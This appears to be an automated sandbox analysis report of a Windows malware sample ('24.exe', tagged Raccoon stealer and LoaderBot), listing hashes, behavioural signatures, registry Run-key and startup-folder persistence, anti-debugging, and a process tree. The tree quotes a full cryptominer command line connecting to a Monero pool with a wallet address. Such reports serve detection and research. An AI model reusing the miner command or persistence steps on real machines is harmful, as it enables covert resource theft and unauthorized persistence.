Analysis
-
max time kernel
4265102s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
15-01-2022 09:54
Static task
static1
Behavioral task
behavioral1
Sample
24.exe
Resource
win7-en-20211208
0 signatures
0 seconds
General
-
Target
24.exe
-
Size
7.0MB
-
MD5
ae6510d9815c44a818f722ecae6844b8
-
SHA1
2a34b5110f5c3c2424ae9685f57261e2546bd963
-
SHA256
c3cad582268b165711e2f2b1834891c7bcb5e57a7efb1e709e3df19d011ad656
-
SHA512
8caa9e661403d5d86f69e7c35e45cdf927ef9ec0c6045ed2ca5af2eaaf26b4f99291eadaf2f0c8c00a31b05b228c6df0c4bd205a7b3ec70e263313a08ffef4f8
Malware Config
Extracted
Family
raccoon
Version
1.8.4-hotfixs
rc4.plain
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 868 created 3512 868 WerFault.exe 56 -
LoaderBot executable 4 IoCs
resource yara_rule behavioral2/memory/372-172-0x00000000001D0000-0x0000000000616000-memory.dmp loaderbot behavioral2/memory/372-171-0x00000000001D0000-0x0000000000616000-memory.dmp loaderbot behavioral2/memory/372-180-0x00000000001D0000-0x0000000000616000-memory.dmp loaderbot behavioral2/memory/372-181-0x00000000001D0000-0x0000000000616000-memory.dmp loaderbot -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 3512 111.exe 372 2.exe 868 Driver.exe 1776 Driver.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 2.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 2.exe -
Loads dropped DLL 15 IoCs
pid Process 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe 856 24.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\2.exe" 2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3512 111.exe 372 2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1504 3512 WerFault.exe 56 1316 868 WerFault.exe 71 -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotification.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotification.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 372 2.exe 372 2.exe 3512 111.exe 3512 111.exe 1504 WerFault.exe 1504 WerFault.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe 372 2.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 372 2.exe Token: SeRestorePrivilege 1504 WerFault.exe Token: SeBackupPrivilege 1504 WerFault.exe Token: SeShutdownPrivilege 1244 MusNotification.exe Token: SeCreatePagefilePrivilege 1244 MusNotification.exe Token: SeLockMemoryPrivilege 868 Driver.exe Token: SeLockMemoryPrivilege 868 Driver.exe Token: SeLockMemoryPrivilege 1776 Driver.exe Token: SeLockMemoryPrivilege 1776 Driver.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3672 wrote to memory of 856 3672 24.exe 53 PID 3672 wrote to memory of 856 3672 24.exe 53 PID 856 wrote to memory of 2024 856 24.exe 54 PID 856 wrote to memory of 2024 856 24.exe 54 PID 2024 wrote to memory of 3512 2024 cmd.exe 56 PID 2024 wrote to memory of 3512 2024 cmd.exe 56 PID 2024 wrote to memory of 3512 2024 cmd.exe 56 PID 856 wrote to memory of 3636 856 24.exe 57 PID 856 wrote to memory of 3636 856 24.exe 57 PID 3636 wrote to memory of 372 3636 cmd.exe 59 PID 3636 wrote to memory of 372 3636 cmd.exe 59 PID 3636 wrote to memory of 372 3636 cmd.exe 59 PID 868 wrote to memory of 3512 868 WerFault.exe 56 PID 868 wrote to memory of 3512 868 WerFault.exe 56 PID 372 wrote to memory of 868 372 2.exe 71 PID 372 wrote to memory of 868 372 2.exe 71 PID 372 wrote to memory of 1776 372 2.exe 75 PID 372 wrote to memory of 1776 372 2.exe 75
Processes
-
C:\Users\Admin\AppData\Local\Temp\24.exe"C:\Users\Admin\AppData\Local\Temp\24.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\24.exe"C:\Users\Admin\AppData\Local\Temp\24.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\111.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\111.exeC:\Users\Admin\AppData\Local\Temp\111.exe4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 9085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\2.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\2.exeC:\Users\Admin\AppData\Local\Temp\2.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 868 -s 7566⤵
- Program crash
PID:1316
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3512 -ip 35121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:868
-
C:\Windows\system32\MusNotification.exeC:\Windows\system32\MusNotification.exe1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 868 -ip 8681⤵PID:1920